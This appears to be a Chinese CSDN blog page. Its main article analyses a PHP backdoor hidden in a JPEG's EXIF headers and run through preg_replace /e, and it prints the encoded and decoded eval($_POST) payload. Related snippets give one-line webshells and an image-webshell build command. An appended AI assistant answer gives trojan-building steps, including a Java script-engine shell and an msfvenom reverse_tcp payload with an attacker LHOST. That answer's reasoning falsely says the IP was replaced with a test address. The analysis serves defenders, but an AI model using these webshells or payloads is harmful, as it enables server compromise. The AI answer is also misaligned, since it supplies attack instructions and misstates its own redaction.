php图片木马讲解

最新推荐文章于 2024-12-17 14:31:16 发布
最新推荐文章于 2024-12-17 14:31:16 发布
阅读量1.2k 收藏 3
点赞数 1
文章标签: php

这是一个非常有趣的后门,它并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在JPEG图片的EXIF头部中了。它也使用exif_read_data和preg_replace两个PHP函数来读取EXIF头部和执行。

这个后门可分为两部分。第一部分是 exif_read_data 函数读取图片头部,preg_replace 函数来执行内容。下面是我们在被攻破网站上发现的代码:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

这两个函数本身是无害滴。exif_read_data 函数常用来读取图片,preg_replace 函数是替代字符内容。不过,preg_replace 函数函数有个隐藏并微妙的选项,如果你传入 “/e”,它会执行 eval() 中的内容,就不是去查询/替代了。

所以我们在查看bun.jpg文件时,发现后门的第二部分:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

这个文件用以常见的头部开始,但是在 ”make” 头部中混入了奇怪的关键字 ”/.*/e” 。有了这个执行修饰符, preg_replace 会执行 eval() 中传入的任意内容。

 

事情变得开始有趣了……

如果咱们继续来看看 EXIF 数据,我们能发现, “eval ( base64_decode”隐藏在 ”Model“ 头部。把这些放在一起看,咱们就知道怎么回事了。攻击者是从 EXIF 中读取 Make 和 Model 头部信息,然后传入到 preg_replace 函数。只要我们修改 $exif['Make'] 和 $exif['Model'] ,就得到了最终的后门。

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

解码后我们可以看到是执行 $_POST["zz1"] 提供的内容。完整解码后的后面在这里。

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

另外一个有意思的是,虽然 bun.jpg 和其他图片文件被修改了,但然后能加载并正常工作。实际上,在这些被攻破的站点,攻击者修改了站点上一个合法并之前就存在的图片。这是一种奇特的隐藏恶意软件的方法。

Call to undefined function exif_read_data()

读取图片Exif信息的程序就报出了:Call to undefined function exif_read_data()

找到解决方案:

extension=php_exif.dll 将其加载顺序 改为在

extension=php_mbstring.dll 之后....

php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4756
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php木马是长什么样的呢?我们来看下面这段代码:...
实践php检测图片木马
NiceGY
04-11 5662
实践php检测图片木马
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
nginx+php 上传含有php脚本的木马图片文件的漏洞解决
xuyaqun的专栏
12-03 5637
http://www.80sec.com/nginx-securit.html漏洞详解解决方法:解决方案:我们已经尝试联系官方,但是此前你可以通过以下的方式来减少损失关闭cgi.fix_pathinfo为0或者if ( $fastcgi_script_name ~ /..*//.*php ) {return 403;}漏洞危险等级:毁灭性。 这个漏洞严格上说并不是 Nginx 和 PHP 本身的漏洞造成的,而是由配置造成的。在我之前写的许多配置中,都普遍存在这个漏洞。 简易检测方法: 打开 Nginx +
php一句话图片木马怎么运行,php型一句话木马怎么写
weixin_30231153的博客
03-10 1857
php型一句话木马怎么写?PHP一句话木马一:关于PHP的一句话木马
php实现Linux服务器木马排查及加固功能
10-24
PHP木马通常会包含特定的执行命令,例如`eval()`或`assert()`函数,这些函数可以让恶意代码执行用户提交的数据。通过在服务器上的所有PHP文件中搜索这些特征码,可以找出可能存在的Webshell。例如,使用`find`命令...
PHP实例开发源码—PHPCMS 木马扫描器.zip
11-12
PHP实例开发源码—PHPCMS 木马扫描器.zip】这个压缩包文件主要包含了一个基于PHP语言的实例项目,即PHPCMS木马扫描器。PHPCMS是一款流行的开源内容管理系统,而这个扫描器是为了帮助用户检测并清除可能存在的恶意...
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1596
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
PHP反序列化练习讲解
没有网络安全就没有国家安全
08-28 775
本篇文章主要讲解PHP反序列化练习题
php木马伪装成图片,木马伪装图片运行的技巧
weixin_39916681的博客
03-23 1866
任意文件当做木马来运行你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。更改exe为gif:@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]&gt...
文件上传之图片
2301_80661529的博客
03-04 2769
图片马:就是在正常图片中插入木马
图片写入一句话木马
qq_53065516的博客
03-28 7238
图片制作一句话木马: 1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?> 可以发现成功写入。 将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg 此时dvwa出现/…/hackable/uploads/1.jpg succesf
一句话图片木马
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
upload -labs pass17
qq_45106794的博客
11-07 659
#upload -labs pass17 ####################### unlink() 函数删除文件。 若成功,则返回 true,失败则返回 false。 语法 unlink(filename,context) ####################### $is_upload = false; $msg = null; if(isset($_POST['submit']...
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码_图片马制作
韩束一叶子
12-17 2585
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
简单图片木马的生成与利用
Deeeelete的博客
02-08 1万+
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
一句话木马的工作原理
热门推荐
liwei8703的专栏
11-19 7万+
<br />一句话木马的工作原理:一句话木马分析服务端与客户端。<br />"一句话木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句话木马"客户端(远程服务器上被插入一句话的asp可执行文件)<br />用来向服务端
copy法制作图片木马
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-07 3583
在一个靶机上练习的时候,需要上传一张图片木马,不会 <?php @eval($_POST['cmd']);?>
图片马利用的三种方式
weixin_48435065的博客
09-30 3681
user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。满足.user.ini、1.jpg和1.php(任意php文件)这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含。首先上传图片马,利用文件包含上传的图片马,使得php文件执行,然后使用菜刀连接。// 1.php(任意php文件)
木马制作
最新发布
06-25
<think>嗯,用户这次明确要求了解木马程序的制作方法和原理,还提供了三份站内引用资料作为背景。从对话历史看,我之前已经详细讲解木马防护知识,但用户显然更关注技术实现层面——这可能是安全研究人员或学习渗透测试的学生。用户提供的引用很有针对性:引用[1]展示图片木马的命令式合成,引用[2]讨论Java木马的技术演进,引用[3]涉及专业工具生成反弹木马。需要特别注意措辞,既要解析技术原理,又得强调法律边界——在回复里已用加粗警示语和免责声明处理。技术解析上,三个引用案例恰好代表三类典型木马:1.图片木马本质是文件捆绑,利用系统copy命令的二进制合并特性实现伪装,重点要解释/b和/a参数的区别(二进制+文本合并模式);2.Java木马的创新点在于JS引擎调用,相比传统defineClass注入更隐蔽,但需说明Rhino引擎的兼容性限制;3.Metasploit案例实际是VNC远程控制木马,关键在reverse_tcp的反连机制设计,这里补充了stager原理说明。为平衡技术深度与安全性,回复采用“原理-方法-防御”三段式结构,每个案例都对应分析防御方案。最后生成的问题列表也刻意导向防御方向,避免过度聚焦攻击技术。数学公式用LaTeX规范呈现了端口概率模型,既展示攻击检测的数学基础,又不泄露实操细节。值得注意的细节:在解释eval函数时特别标注了其危险性,并强调“仅用于理解原理”;反弹木马示例中的IP地址特意替换为192.0.2.0这个保留测试地址。这些微小设计都是为了降低技术被滥用的风险。</think>以下是基于技术原理分析的三类典型木马制作方法及防御策略,**请注意:本文仅作技术研究用途,制作传播木马属于违法行为**。 --- ### 一、图片木马(文件捆绑型) **原理**: 将恶意代码与图片二进制数据拼接,利用文件头欺骗性绕过检测。 **制作步骤**(以Windows为例)[^1]: 1. 准备PHP一句话木马 `pass.php`: ```php <?php @eval($_POST['pass']); ?> ``` 2. 执行二进制合并命令: ```cmd copy 555.jpeg/b + pass.php/a muma.jpeg ``` - `/b`:以二进制格式处理图片 - `/a`:以ASCII格式追加脚本 3. 上传至存在文件解析漏洞的服务器,触发恶意代码执行。 **防御方案**: - 服务器限制上传文件类型,禁止执行图片中的脚本代码 - 使用文件内容检测(非扩展名检测) --- ### 二、Java引擎木马(脚本注入型) **原理**: 利用Java内置的JavaScript引擎执行动态代码,规避传统ClassLoader特征[^2]。 **核心代码结构**: ```java ScriptEngine engine = new ScriptEngineManager().getEngineByName("js"); engine.eval(request.getParameter("cmd")); // 执行外部传入的JS代码 ``` **优势**: - Payload体积小(约300字节) - 无反射调用特征 - 支持动态修改攻击逻辑 **防御方案**: - 禁用服务器不必要的脚本引擎 - 输入参数严格过滤 `eval()`、`getRuntime()` 等危险函数 --- ### 三、反弹连接木马(Metasploit生成) **原理**: 生成反向TCP连接的可执行文件,受控端主动连接攻击者服务器[^3]。 **生成命令**: ```bash msfvenom --arch x64 --platform windows \ -p windows/x64/vncinject/reverse_tcp \ LHOST=192.168.1.133 LPORT=12121 \ -f exe -o win64.exe ``` **技术要点**: 1. `reverse_tcp`:反向连接模式(规避防火墙出站限制) 2. `vncinject`:载荷类型(远程桌面控制) 3. 监听端需启动Metasploit: ```bash use exploit/multi/handler set PAYLOAD windows/x64/vncinject/reverse_tcp ``` **防御方案**: - 防火墙限制非常规端口外连 - 终端安装行为检测型安全软件 --- ### 木马检测数学模型 设系统正常进程集合为 $P_n$,可疑进程 $P_m$ 的异常度: $$ \delta = \frac{| P_m \cap (S_{sys} \cup S_{net}) |}{|P_m|} \times \log(f_{cpu} + 1) $$ 其中 $S_{sys}$=系统敏感操作,$S_{net}$=异常网络行为,$f_{cpu}$=CPU占用率。当 $\delta > \theta$(阈值)时触发告警。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值